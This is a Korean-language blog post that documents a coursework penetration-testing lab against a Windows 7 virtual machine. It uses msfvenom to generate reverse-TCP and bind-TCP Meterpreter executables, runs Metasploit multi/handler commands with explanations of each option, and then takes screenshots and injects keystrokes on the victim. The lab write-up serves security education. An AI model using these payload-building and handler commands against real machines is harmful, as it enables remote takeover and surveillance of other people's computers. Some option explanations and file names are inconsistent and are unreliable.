[모의 해킹] 윈도우7 OS 침투 작업

! 이 포스트의 내용은 전공 강의에서 다룬 리눅스 보안 실습의 기록용이며, 이는 학습 목적으로만 사용되어야 합니다.

! 어떠한 경우에도 이러한 기술을 악용하거나 불법적인 활동에 사용해서는 안 됩니다.

 

! 모의 해킹과 관련된 실습은 합법적인 환경에서만 수행되어야 하며, 무단으로 다른 사람의 시스템에 접근하는 등의 행위는 법적인 문제로 이어질 수 있습니다. 이러한 기술을 사용할 때에는 항상 윤리적인 책임을 갖고 행동해야 합니다.

 

 

---

 

📝 실습 전 용어 정리 

  · Reverse TCP

   - (연결 시작 주체) 공격 대상 시스템이 연결을 시작

   - (연결 방향) 공격자는 Meterpreter를 실행하는 동안 자신의 시스템에서 연결을 대기

 

  · Bind TCP

   - (연결 시작 주체) 공격자가 연결을 시작

   - (연결 방향) 공격자의 시스템에서 공격 대상 시스템으로의 연결

 

---

•  실습 환경
  • (가상 환경 VMware Workstation
  • (공격자 PC) Kali Linux
  • (공격 대상 PC) Windows 7

---

01. reverse 악성코드를 사용한 windows 7 해킹

 

  01-01. 공격자 PC 환경 설정

    - 악성코드 다운을 위한 Apache2 서버 오픈

~# service apache2 start
~# service apache2 status

 

---

  01-02. msfvenom 명령어로 악성코드 파일 생성

      * msfvenom = Metasploit의 Payload Generator로, 다양한 페이로드를 생성하는 데 사용됨

        페이로드는 공격자가 시스템에 주입하고 실행할 코드를 의미.

        일반적으로 원격 쉘/명령 쉘을 포함한 악성코드를 생성하는 데 사용

 

     * 일반적인 msfvenom의 구문

msfvenom -p [Payload] [Options]

 

 

    - reverse 악성코드 파일 생성

 

~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=[공격자 IP] -f exe -o reverse_path.exe

 

  * 이 명령은 Meterpreter를 사용하여  Windows 시스템에 대한 reverse TCP 연결을 설정하는 페이로드를 생성하고, 해당 페이로드를 reverse_path.exe라는 이름의 실행 가능한 파일로 저장한다. 이 파일은 공격자가 설정한 LHOST(공격자 IP)로부터 Meterpreter 셸에 접근하기 위해 사용될 수 있다.

 

  명령어 각 옵션의 역할은 다음과 같다.

 

  ' -p windows/meterpreter/reverse_tcp '

    - 이 옵션은 생성하련는 페이로드의 유형을 지정

    - 여기서는 Meterprter 셸을 사용하여 Windows 시스템에 대한 reverse TCP 연결을 설정하는 페이로드를 생성하려는 것임

  ' LHOST=[공격자  IP] '

    - 이 옵션은 공격자가 연결을 기다리는 IP 주소를 지정

    - 여기서는 Meterpreter가 연결되기 위해 공격 대상 시스템이 연결해야 하는 IP 주소, 즉 공격자 IP 주소를 제공해야 함

  ' -f exe '

    - 이 옵션은 생성된 파일의 형식을 지정

    - 여기서는 실행가능한 Windows 응용 프로그램(.exe)파일 형식을 선택함

  ' -o reverse_path.exe '

    - 이 옵션은 생성된 페이로드 파일의 이름과 경로를 지정

    - 여기서는 생성된 파일을 reverse_path.exe로 저장할 것임

---

  01-03. Metasploit을 사용하여 reverse 공격 명령어 실행

    - 명령어 입력을 위한 msfconsole 실행

 

    - reverse TCP 연결을 설정하는 공격 수행 명령어

> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set LHOST [공격자 IP]
> set ExitSession false
> exploit -j

 

  · ' use exploit/multi/handler ' 

    - Metasploit에서 역할을 수행할 exploit 모듈을 선택

    - 여기서는 Meterpreter를 사용하여 다중 플랫폼에 대한 핸들러를 사용하겠다는 것을 나타냄

 

  · ' set payload windows/meterpreter/reverse_tcp ' 

    - 선택한 exploit 모듈에 대한 페이로드를 설정

    - 여기서는 Meterpreter를 사용하여 Windows 시스템에 대한 reverse TCP 연결을 설정하는 페이로드를 선택

 

  · ' set LHOST [공격자 IP] '

    - 공격자가 연결을 기다리는 IP 주소를 설정 = 공격자 IP

    - 여기서는 Meterpreter 페이로드가 연결되기 위해 공격 대상 시스템이 연결해야하는 IP 주소를 제공

 

  · ' set Exitsession false ' 

    - Meterpreter 세션을 종료할 때  Metasploit이 자동으로 종료되도록 설정함

    - Meterpreter 세션을 유지하고 추가적인 작업을 수행하기 위한 것

 

  · ' exploit -j ' 

    - 설정한 exploit을 실행하고 공격을 수행함

    - '-j' 옵션은 exploit을 백그라운드에서 실행하고 제어를 다시 터미널로 반환함

 

이러한 과정을 통해 Metasploit은 Meterpreter를 사용하여 설정한 IP 주소로부터 Windows 시스템에 대한 reverse TCP 연결을 대기하고, 성공적으로 연결되면 Meterpreter 세션을 제공한다. 이를 통해 공격자는 해당 시스템에서 다양한 작업을 수행할 수 있다.

 

---

  01-04. Windows에서 악성코드 파일 실행 후 공격 수행

    - reverse_path.exe 파일을 관리자 권한으로 실행

 

    - 공격자 PC(Kali)에서 연결된 공격 대상(Windows) IP 확인

 

    - 세션 리스트 확인하여 공격 대상 IP 확인하여 공격 대상 선택

 

    - screenshot 명령어 사용하여 공격 대상 PC 화면 캡쳐 가능

 

---

 

02. bind 악성코드를 사용한 windows 7 해킹

  02-01. 공격자 PC 환경 설정

    - 01-01과 동일

 

---

  02-02. msfvenom 명령어로 악성코드 파일 생성

    - bind 악성코드 파일 생성

~# msfvenom -p windows/meterpreter/bind_tcp -f exe -o bind_patch.exe

 

  * 이 명령은 Meterpreter를 사용하여  Windows 시스템에 대한 bind TCP 연결을 설정하는 페이로드를 생성하고, 해당 페이로드를 bind_path.exe라는 이름의 실행 가능한 파일로 저장한다. 이 파일은 특정 포트에서 대기하고 있는 Meterpreter 셸에 연결하기 위해 사용될 수 있다.

 

  명령어 각 옵션의 역할은 다음과 같다.

 

  ' -p windows/meterpreter/bind_tcp '

    - 이 옵션은 생성하려는 페이로드의 유형을 지정

    - 여기서는 Meterprter 셸을 사용하여 Windows 시스템에서 bind TCP 연결을 설정하는 페이로드를 생성하려는 것임

    - bind tcp 연결은 특정 포트에서 연결을 대기하고, 연결이 이루어지면 Meterpreter 셸을 실행

  ' -f exe '

    - 이 옵션은 생성된 파일의 형식을 지정

    - 여기서는 실행가능한 Windows 응용 프로그램(.exe)파일 형식을 선택

  ' -o bind_path.exe '

    - 이 옵션은 생성된 페이로드 파일의 이름과 경로를 지정

    - 여기서는 생성된 파일을 bind_path.exe로 저장할 것임

 

---

  02-03. Metasploit을 사용하여 bind 공격 명령어 실행

    - 명령어 입력을 위한 msfconsole 실행

    - bind TCP 연결을 설정하는 공격 수행 명령어

> use exploit/multi/handler
> set payload windows/meterpreter/bind_tcp
> set LHOST [공격자 IP]
> set LPORT [공격자 Port]
> set RHOST [공격대상 IP]
> set RPORT [공격대상 Port]
> set ExitSession false
> exploit -j

 

  · ' use exploit/multi/handler ' 

    - Metasploit에서 역할을 수행할 exploit 모듈을 선택

    - 여기서는 Meterpreter를 사용하여 다중 플랫폼에 대한 핸들러를 사용하겠다는 것을 나타냄

 

  · ' set payload windows/meterpreter/bind_tcp ' 

    - 선택한 exploit 모듈에 대한 페이로드를 설정

    - 여기서는 Meterpreter를 사용하여 Windows 시스템에 대한 bind TCP 연결을 설정하는 페이로드를 선택

 

  · ' set LHOST [공격자 IP] '

    - 공격자가 연결을 기다리는 IP 주소를 설정 = 공격자 IP

    - 여기서는 Meterpreter 페이로드가 연결되기 위해 공격자가 사용할 IP 주소를 제공

 

  · ' set LPORT [공격자 Port] '

    - 공격자가 Meterpreter 세션을 수신하기 위해 대기할 포트 번호를 설정

 

  · ' set RHOST [공격 대상 IP] '

    - 공격 대상의 IP 주소를 설정

    - 여기서는 Meterpreter 페이로드를 실행할 Windows 시스템의 IP 주소를 제공

 

  · ' set RPORT [공격 대상 Port] '

    - 공격 대상의 포트 번호를 설정

 

  · ' set Exitsession false ' 

    - Meterpreter 세션을 종료할 때  Metasploit이 자동으로 종료되도록 설정함

    - Meterpreter 세션을 유지하고 추가적인 작업을 수행하기 위한 것

 

  · ' exploit -j ' 

    - 설정한 exploit을 실행하고 공격을 수행함

    - '-j' 옵션은 exploit을 백그라운드에서 실행하고 제어를 다시 터미널로 반환함

 

  이러한 과정을 통해 Metasploit은 Meterpreter를 사용하여 설정한 IP 주소와 bind TCP 연결을 기다리고, 성공적으로 연결된면 Meterpreter 세션을 제공한다. 이를 통해 공격자는 해당 시스템에서 다양한 작업을 수행할 수 있다.

 

---

  02-04. Windows에서 악성코드 파일 실행 후 공격 수행

    - 공격자 PC(Kali)에서 연결된 공격 대상(Windows) IP 확인

    - 세션 리스트 확인하여 공격 대상 IP 확인하여 공격 대상 선택

    - keyboard_send 명령어 사용하여 공격 대상 PC에 keyboard 제어 가능